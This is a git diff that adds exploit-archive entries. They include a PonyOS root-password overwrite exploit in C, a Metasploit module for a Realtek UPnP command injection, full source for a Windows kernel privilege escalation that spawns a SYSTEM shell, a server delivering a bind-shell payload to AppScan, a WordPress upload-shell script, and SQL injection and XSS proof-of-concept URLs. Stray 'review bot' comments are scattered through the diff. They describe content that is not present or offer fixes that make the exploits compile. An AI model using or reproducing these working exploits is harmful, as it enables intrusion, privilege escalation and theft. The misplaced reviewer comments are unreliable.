+https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf
\ No newline at end of file
diff --git a/platforms/linux/local/37167.c b/platforms/linux/local/37167.c
new file mode 100755
index 000000000..2321272c1
--- /dev/null
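Review bot: The `[DISCLOSURE TIMELINE]` is not in chronological order: `2015-02-16 Vendor released a fix for the reported issue.` is listed before `2015-02-09 Vendor asked to hold-on for the public disclosure.`, and `2015-02-22` is given both as the date the vendor postponed disclosure and as the public disclosure date, so at least one entry looks mistyped and should be checked against the linked report before this is cited as the CVE-2015-1389 history. In `[SOLUTION]`, `Aruba release an update` should read `Aruba released an update`, and step 4 of the reproduction ends with a colon where the other steps end with a semicolon. The transcript's `Content-Length: 58` does not match the body shown, presumably because part of the `username` value was dropped in rendering; a note to that effect would keep readers from taking the visible body as the complete request.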
+++ b/platforms/linux/local/37167.c
@@ -0,0 +1,65 @@
+# Exploit Title: PonyOS <= 3.0 VFS permissions exploit
+# Google Dork: [if applicable]
+# Date: 29th May 2015
+# Exploit Author: Hacker Fantastic
+# Vendor Homepage: www.ponyos.org
+# Software Link: [download link if available]
+# Version: 3.0
+# Tested on: 3.0
+# CVE : N/A
+
+# Source: https://github.com/HackerFantastic/Public/blob/master/exploits/rarity.c
+
+/* MyLittleUnix <= 3.0 VFS permissions root exploit
+ ================================================
+ File permissions are not checked, we can abuse
+ this to replace the root user password with our
+ own and escalate our privileges. This exploit
+ now 20% cooler and tested on latest 3.0 mlp OS.
+
+ -- prdelka
+*/
+#include
+#include
+#include
+#include
+#include
+#include
+
+char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284"
+ "29a65f8f10ce388d301b47865a283147bfd290545b"
+ "0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e"
+ "594cadd:0:0:HackerFantastic:/home/root:/bi"
+ "n/sh:fancy\n";
+
+int main(){
+ int fd, r;
+ struct stat *fileinfo = malloc(sizeof(struct stat));
+ char *buffer, *line, *filenm = "/etc/master.passwd";
+ printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n");
+ fd = open(filenm,O_RDWR);
+ r = stat(filenm,fileinfo);
+ buffer = malloc((uint)fileinfo->st_size);
+ if(buffer){
+ read(fd,buffer,fileinfo->st_size);
+ }
+ else{
+ printf("[!] No pwn for you pwnie\n");
+ exit(0);
+ }
+ lseek(fd,0,SEEK_SET);
+ line = strtok(buffer,"\n");
+ while(line){
+ if(strstr(line,"root:")){
+ write(fd,pwnystr,strlen(pwnystr));
+ }
+ else{
+ write(fd,line,strlen(line));
+ write(fd,"\n",strlen("\n"));
+ }
+ line = strtok(NULL,"\n");
+ }
+ close(fd);
+ printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n");
+ exit(0);
+}
\ No newline at end of file
diff --git a/platforms/linux/local/37168.txt b/platforms/linux/local/37168.txt
new file mode 100755
index 000000000..bb04531d5
--- /dev/null
+++ b/platforms/linux/local/37168.txt
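Review bot: The EDB metadata header (`# Exploit Title: …` through `# Source: …`) sits at file scope outside any comment, and a line such as `# Exploit Title:` is not a valid preprocessing directive, so the file as committed does not compile; moving those lines inside the existing `/* … */` block or prefixing each with `//` fixes that without touching the code. The six `#include` lines show no header name at all, presumably the `<…>` part was lost in rendering, but as printed they are empty directives and fail the same way. In `main`, the results of `open()`, `stat()` and the `malloc()` for `fileinfo` are never checked, so a missing or unreadable `/etc/master.passwd` carries on with `fd == -1` and an uninitialised `st_size`; a guard such as `if (fd < 0 || r != 0) { perror(filenm); exit(1); }` after the `stat` call is the minimal fix.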
@@ -0,0 +1,14 @@
+# Exploit Title: PonyOS <= 3.0 ELF loader privilege escalation
+# Google Dork: [if applicable]
+# Date: 29th May 2015
+# Exploit Author: Hacker Fantastic
+# Vendor Homepage: www.ponyos.org
+# Software Link: [download link if available]
+# Version: 3.0
+# Tested on: 3.0
+# CVE : N/A
+
+Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true
+EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
+
+Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html
\ No newline at end of file
diff --git a/platforms/linux/remote/37169.rb b/platforms/linux/remote/37169.rb
new file mode 100755
index 000000000..1e3ef7f2d
--- /dev/null
+++ b/platforms/linux/remote/37169.rb
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ include REXML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
+ 'Description' => %q{
+ Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
+ injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
+ there is no output for the executed command. This module has been tested successfully on a
+ Trendnet TEW-731BR router with emulation.
+ },
+ 'Author' =>
+ [
+ 'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery
+ 'Michael Messner ' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2014-8361'],
+ ['ZDI', '15-155'],
+ ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],
+ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']
+ ],
+ 'DisclosureDate' => 'Apr 24 2015',
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Targets' =>
+ [
+ [ 'MIPS Little Endian',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE
+ }
+ ],
+ [ 'MIPS Big Endian',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0
+ ))
+
+ deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
+
+ register_options(
+ [
+ Opt::RPORT(52869) # port of UPnP SOAP webinterface
+ ], self.class)
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => '/picsdesc.xml'
+ })
+ if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/
+ return Exploit::CheckCode::Detected
+ end
+ rescue ::Rex::ConnectionError
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Unknown
+ end
+
+ def exploit
+ print_status("#{peer} - Trying to access the device ...")
+
+ unless check == Exploit::CheckCode::Detected
+ fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+ end
+
+ print_status("#{peer} - Exploiting...")
+
+ execute_cmdstager(
+ :flavour => :echo,
+ :linemax => 50,
+ :nodelete => true
+ )
+ end
+
+ def execute_command(cmd, opts)
+ uri = '/wanipcn.xml'
+ soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'
+ data_cmd = '' + build_soap_req
+
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'vars_get' => {
+ 'service' => 'WANIPConn1'
+ },
+ 'ctype' => 'text/xml',
+ 'method' => 'POST',
+ 'headers' => {
+ 'SOAPAction' => soap_action
+ },
+ 'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`")
+ })
+ return res
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+
+ def build_soap_req
+ new_external_port = rand(32767) + 32768
+ new_internal_port = rand(32767) + 32768
+
+ xml = Document.new
+
+ xml.add_element(
+ 'SOAP-ENV:Envelope',
+ {
+ 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
+ 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
+ })
+
+ xml.root.add_element('SOAP-ENV:Body')
+
+ body = xml.root.elements[1]
+
+ body.add_element(
+ 'm:AddPortMapping',
+ {
+ 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'
+ })
+
+ port_mapping = body.elements[1]
+ port_mapping.add_element('NewLeaseDuration')
+ port_mapping.add_element('NewInternalClient')
+ port_mapping.add_element('NewEnabled')
+ port_mapping.add_element('NewExternalPort')
+ port_mapping.add_element('NewRemoteHost')
+ port_mapping.add_element('NewProtocol')
+ port_mapping.add_element('NewInternalPort')
+
+ port_mapping.elements['NewLeaseDuration'].text = ''
+ port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'
+ port_mapping.elements['NewEnabled'].text = '1'
+ port_mapping.elements['NewExternalPort'].text = "#{new_external_port}"
+ port_mapping.elements['NewRemoteHost'].text = ''
+ port_mapping.elements['NewProtocol'].text = 'TCP'
+ port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}"
+
+ xml.to_s
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/37050.txt b/platforms/php/webapps/37050.txt
new file mode 100755
index 000000000..f3579298a
--- /dev/null
+++ b/platforms/php/webapps/37050.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Chronosite 5.12 SQL Injection
+# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site"
+# Date: 13/05/15
+# Exploit Author: Wad Deek
+# Vendor Homepage: http://www.chronosite.org/
+# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip
+# Version: 5.12
+# Tested on: Xampp on Windows7
+################################################################
+PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27
+################################################################
\ No newline at end of file
diff --git a/platforms/php/webapps/37155.txt b/platforms/php/webapps/37155.txt
new file mode 100755
index 000000000..5f6930ccb
--- /dev/null
+++ b/platforms/php/webapps/37155.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53497/info
+
+WP-FaceThumb is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+WP-FaceThumb 0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/?page_id=1&pagination_wp_facethumb=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/37156.txt b/platforms/php/webapps/37156.txt
new file mode 100755
index 000000000..6f0004b02
--- /dev/null
+++ b/platforms/php/webapps/37156.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53501/info
+
+GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/getsimple/admin/theme.php?err=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
\ No newline at end of file
diff --git a/platforms/php/webapps/37157.txt b/platforms/php/webapps/37157.txt
new file mode 100755
index 000000000..dc5fb3a8a
--- /dev/null
+++ b/platforms/php/webapps/37157.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53501/info
+
+GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/getsimple/admin/pages.php?error=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
\ No newline at end of file
diff --git a/platforms/php/webapps/37158.txt b/platforms/php/webapps/37158.txt
new file mode 100755
index 000000000..0dc1cd583
--- /dev/null
+++ b/platforms/php/webapps/37158.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/53501/info
+
+GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/getsimple/admin/index.php?success=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E
+http://www.example.com/getsimple/admin/index.php?err=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37159.txt b/platforms/php/webapps/37159.txt
new file mode 100755
index 000000000..4e05912a3
--- /dev/null
+++ b/platforms/php/webapps/37159.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53501/info
+
+GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/getsimple/admin/upload.php?path=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E&newfolder=rem0ve
\ No newline at end of file
diff --git a/platforms/php/webapps/37161.txt b/platforms/php/webapps/37161.txt
new file mode 100755
index 000000000..fa7a6e3af
--- /dev/null
+++ b/platforms/php/webapps/37161.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53511/info
+
+The GRAND Flash Album Gallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+GRAND Flash Album Gallery 1.71 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37162.txt b/platforms/php/webapps/37162.txt
new file mode 100755
index 000000000..706a0cc1b
--- /dev/null
+++ b/platforms/php/webapps/37162.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53513/info
+
+Dynamic Widgets plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Dynamic Widgets 1.5.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37166.php b/platforms/php/webapps/37166.php
new file mode 100755
index 000000000..0bf4db439
--- /dev/null
+++ b/platforms/php/webapps/37166.php
@@ -0,0 +1,24 @@
+###################################################################################################
+# Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability
+# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
+# Author: bl4ck-dz
+# Date: 28/05/2015
+# Infected File: upload.php
+# Category: webapps
+# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/
+# Tested on : Linux | Windows
+###################################################################################################
+"@$evil"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch); curl_close($ch);
+echo "$postResult";
+?>
+Shell Access :
+http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil
+
+# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !
\ No newline at end of file
diff --git a/platforms/windows/dos/37160.pl b/platforms/windows/dos/37160.pl
new file mode 100755
index 000000000..345654fb3
--- /dev/null
+++ b/platforms/windows/dos/37160.pl
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/53508/info
+
+Universal Reader is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+Universal Reader 1.16.740.0 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl -w
+$filename="a"x129;
+print "------Generate testfile \"a\"x129.epub------\n";
+open(TESTFILE, ">$filename.epub");
+sleep(3);
+close(TESTFILE);
+print "------Complete!------\n";
+exit(1);
+
diff --git a/platforms/windows/local/37098.txt b/platforms/windows/local/37098.txt
new file mode 100755
index 000000000..a0826d777
--- /dev/null
+++ b/platforms/windows/local/37098.txt
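Review bot: `open(TESTFILE, ">$filename.epub")` in the 37160.pl hunk never checks its return value, so when the create fails (a 129-character name exceeds some filesystems' limits) the script still prints `------Complete!------` and reports nothing useful; prefer `open(my $fh, '>', "$filename.epub") or die "cannot create $filename.epub: $!";` with a matching `close($fh)`. `exit(1)` on the success path signals failure to any caller or wrapper, so `exit(0)` is the conventional code there. The `sleep(3)` between open and close has no visible purpose and deserves a comment saying why it is there, or removal.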
@@ -0,0 +1,352 @@ +// ex.cpp +/* + Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP + CVE-2015-0003 + March 2015 (Public Release: May 24, 2015) + + Tested on: + x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 + x64: Win 2k8 SP1 | Win 2k8 R2 SP1 + + Author: Skylake - skylake mail com +*/ + +#include "ex.h" + +_ZwAllocateVirtualMemory ZwAllocateVirtualMemory; +_PsLookupProcessByProcessId PsLookupProcessByProcessId; +_PsReferencePrimaryToken PsReferencePrimaryToken; +DWORD Pid; +ATOM atom; +BOOL KrnlMode, bSpawned; + +DWORD_PTR WINAPI pti() +{ +#ifdef _M_X64 + LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); + return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); +#else + LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); + return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); +#endif +} + +BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) +{ + DWORD_PTR dwIndex, dwMask; + +#ifdef _M_X64 + dwMask = ~0xf; +#else + dwMask = ~7; +#endif + // + dwCurrentValue &= dwMask; + + for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) + { + if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) + { + // + pdwStructure[dwIndex] = dwNewValue; + return TRUE; + } + } + + return FALSE; +} + +BOOL WINAPI Init() +{ + HMODULE hMod = NULL; + PVOID Base = NULL; + OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; + PSYSTEM_MODULE_INFORMATION pm = NULL; + BOOL RetVal = FALSE; + + __try { + + if( !GetVersionEx( &ov ) ) __leave; + + if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) + { + atom = 0xc039; + } + + else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) + { + atom = ( ov.dwMinorVersion == 1 ) ? 
0xc03c : 0xc03a; + } + + if( !atom ) __leave; + + _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); + if( !ZwQuerySystemInformation ) __leave; + + ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); + if( !ZwAllocateVirtualMemory ) __leave; + + ULONG len; + LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); + if( !status ) __leave; + + pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); + if( !pm ) __leave; + status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); + if( status ) __leave; + + CHAR szKrnl[MAX_PATH] = { 0 }, *t; + + for( ULONG i = 0; i < pm->Count; ++i ) + { + if( strstr( pm->Module[i].ImageName, "exe" ) ) + { + t = strstr( pm->Module[i].ImageName, "nt" ); + if( t ) + { + strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); + Base = pm->Module[i].Base; + break; + } + } + } + + hMod = LoadLibraryA( szKrnl ); + + if( !hMod || !Base ) __leave; + + PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); + if( !PsLookupProcessByProcessId ) __leave; + + PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); + + PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); + + if( !PsReferencePrimaryToken ) __leave; + + PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); + Pid = GetCurrentProcessId(); + RetVal = TRUE; + } + + __finally { + if( pm ) LocalFree( pm ); + if( hMod ) FreeLibrary( hMod ); + } + + return RetVal; +} + +LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam 
) +{ + LPVOID pCurProcess = NULL; + LPVOID pSystemInfo = NULL; + PACCESS_TOKEN systemToken; + PACCESS_TOKEN targetToken; + + PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); + PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); + + targetToken = PsReferencePrimaryToken( pCurProcess ); + systemToken = PsReferencePrimaryToken( pSystemInfo ); + + // + find_and_replace_member( ( PDWORD_PTR ) pCurProcess, + ( DWORD_PTR ) targetToken, + ( DWORD_PTR ) systemToken, + 0x200 ); + KrnlMode = TRUE; + return 0; +} + +VOID WINAPI leave() +{ + keybd_event( VK_ESCAPE, 0, 0, NULL ); + keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); + keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); +} + +LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) +{ + if( bSpawned ) + { + leave(); + ExitProcess( 0 ); + } + + switch( message ) + { + case WM_CREATE: + SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); + FlashWindow( hWnd, TRUE ); + keybd_event( VK_LWIN, 0, 0, NULL ); + break; + case WM_CLOSE: + DestroyWindow( hWnd ); + break; + case WM_DESTROY: + PostQuitMessage( 0 ); + break; + case WM_TIMER: + KillTimer( hWnd, ID_TIMER ); + leave(); + DestroyWindow( hWnd ); + break; + default: + return DefWindowProc( hWnd, message, wParam, lParam ); + } + return 0; +} + +int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, + _In_opt_ HINSTANCE hPrevInstance, + _In_ LPTSTR lpCmdLine, + _In_ int nCmdShow ) +{ + WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; + HWND hWnd = NULL; + MSG Msg = { 0 }; + + SIZE_T size = 0x1000; + LPVOID addr = ( LPVOID ) 1; + + if( !Init() ) return 1; + + if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) + { + // + return 1; + } + + DWORD_PTR p = pti(); + if( !p ) return 1; + +#ifdef _M_X64 + *( ( PDWORD_PTR ) 0x10 ) = p; + *( ( LPBYTE ) 0x2a ) = 4; + *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; + *( ( PDWORD_PTR ) 0xa8 ) = 0x400; + *( ( LPDWORD ) 0x404 ) = 1; + *( ( 
PDWORD_PTR ) 0x408 ) = 0x800; + *( ( LPWORD ) 0x410 ) = atom; + *( ( LPBYTE ) 0x412 ) = 1; +#else + *( ( LPDWORD ) 0x08 ) = p; + *( ( LPBYTE ) 0x16 ) = 4; + *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; + *( ( LPDWORD ) 0x6c ) = 0x400; + *( ( LPDWORD ) 0x404 ) = 1; + *( ( LPDWORD ) 0x408 ) = 0x800; + *( ( LPWORD ) 0x40c ) = atom; + *( ( LPBYTE ) 0x40e ) = 1; +#endif + + wc.lpfnWndProc = WndProc; + wc.hInstance = hInstance; + wc.lpszClassName = TEXT( "Class" ); + + if( !RegisterClassEx( &wc ) ) + return 1; + hWnd = CreateWindowEx( + WS_EX_CLIENTEDGE, + TEXT( "Class" ), + TEXT( "Window" ), + WS_OVERLAPPEDWINDOW, + CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, + NULL, NULL, hInstance, NULL ); + if( !hWnd ) + return 1; + ShowWindow( hWnd, SW_HIDE ); + UpdateWindow( hWnd ); + + while( GetMessage( &Msg, NULL, 0, 0 ) ) + { + if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 + { + if( !KrnlMode ) + { + Msg.hwnd = ( HWND ) NULL; + } + else + { + Msg.hwnd = hWnd; + if( !bSpawned ) + { + ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); + bSpawned = TRUE; + } + } + } + + TranslateMessage( &Msg ); + DispatchMessage( &Msg ); + } + + return ( int ) Msg.wParam; +} +// EOF + + + + + + +//ex.h + +#pragma once + +#include +#include +#include + +typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _In_ ULONG_PTR ZeroBits, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG AllocationType, + _In_ ULONG Protect + ); + +typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( + _In_ HANDLE ProcessId, + _Out_ PVOID *Process + ); + +typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( + _Inout_ PVOID Process + ); + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemBasicInformation = 0, + SystemModuleInformation = 11 +} SYSTEM_INFORMATION_CLASS; + +typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( + _In_ SYSTEM_INFORMATION_CLASS 
SystemInformationClass, + _Inout_ PVOID SystemInformation, + _In_ ULONG SystemInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { + HANDLE Section; + PVOID MappedBase; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT LoadOrderIndex; + USHORT InitOrderIndex; + USHORT LoadCount; + USHORT PathLength; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Count; + SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +#define ID_TIMER 0x1 +#define WM_SYSTIMER 0x118 +// EOF \ No newline at end of file diff --git a/platforms/windows/remote/37163.py b/platforms/windows/remote/37163.py new file mode 100755 index 000000000..ca0207918 --- /dev/null +++ b/platforms/windows/remote/37163.py 
@@ -0,0 +1,239 @@
+#!/usr/bin/python
+
+import BaseHTTPServer, socket
+
+##
+# IBM Security AppScan Standard OLE Automation Array Remote Code Execution
+#
+# Author: Naser Farhadi
+# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
+#
+# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
+#
+# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/
+# if you able to exploit IE then you can exploit appscan and acunetix ;)
+# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
+# Metasploit windows/shell_bind_tcp Executable Payload
+#
+# Usage:
+# chmod +x appscan.py
+# ./appscan.py
+# ...
+# nc 172.20.10.14 333
+#
+# Video: http://youtu.be/hPs1zQaBLMU
+##
+
+class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
+ def do_GET(req):
+ req.send_response(200)
+ if req.path == "/payload.exe":
+ req.send_header('Content-type', 'application/exe')
+ req.end_headers()
+ exe = open("payload.exe", 'rb')
+ req.wfile.write(exe.read())
+ exe.close()
+ else:
+ req.send_header('Content-type', 'text/html')
+ req.end_headers()
+ req.wfile.write("""Please scan me!
+ """)
+
+if __name__ == '__main__':
+ sclass = BaseHTTPServer.HTTPServer
+ server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
+ print "Http server started", socket.gethostbyname(socket.gethostname()), 80
+ try:
+ server.serve_forever()
+ except KeyboardInterrupt:
+ pass
+ server.server_close()
\ No newline at end of file
diff --git a/platforms/windows/remote/37165.py b/platforms/windows/remote/37165.py
new file mode 100755
index 000000000..ab073f9e3
--- /dev/null
+++ b/platforms/windows/remote/37165.py
@@ -0,0 +1,157 @@
+#!/usr/bin/python
+#Exploit Title:WebDrive Buffer OverFlow PoC
+#Author: metacom
+#Vendor Homepage: http://www.webdrive.com/products/webdrive/
